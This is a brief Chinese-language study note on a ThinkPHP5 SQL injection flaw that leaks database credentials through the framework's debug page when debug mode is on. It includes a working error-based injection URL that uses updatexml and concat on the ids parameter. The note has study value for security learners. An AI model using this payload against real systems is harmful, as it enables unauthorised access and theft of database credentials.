ThinkPHP5 SQL注入漏洞 && 敏感信息泄露
漏洞原理:
xz.aliyun.com
记笔记:
【1】该漏洞形成最关键的一点是需要开启debug模式。 【2】数据库账户和密码泄漏的前提是SQL语句执行失败或者发生异常的时候才会出现。如果非SQL语法错误的debug模式下是不会泄漏数据库账户和密码的。
漏洞利用:
http://your-ip/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1
信息成功被爆出:
DEBUG页面,我们找到了数据库的账号、密码: